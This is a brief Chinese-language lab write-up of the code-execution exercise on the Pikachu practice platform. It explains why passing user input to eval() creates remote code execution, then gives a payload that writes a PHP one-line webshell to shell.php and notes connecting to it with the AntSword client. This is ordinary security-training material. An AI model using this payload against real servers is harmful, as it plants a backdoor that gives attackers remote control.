任务一:代码执行
实验环境:
本地搭建pikachu。
进入pikachu平台。进入RCE模块。点击exec“eval”。
步骤:
- 分析源码。分析为什么会造成代码执行漏洞。
直接把输入的内容放在 eval() 函数中。即把用户的输入作为代码的一部分进行执行,造成了远程代码执行漏洞。
- 漏洞利用
a) 执行phpinfo();
b)上传一句话木马
执行payload:
fputs(fopen('shell.php','w'),'<?php @eval($_POST[a]);?>');
验证一句话木马:
连接蚁剑: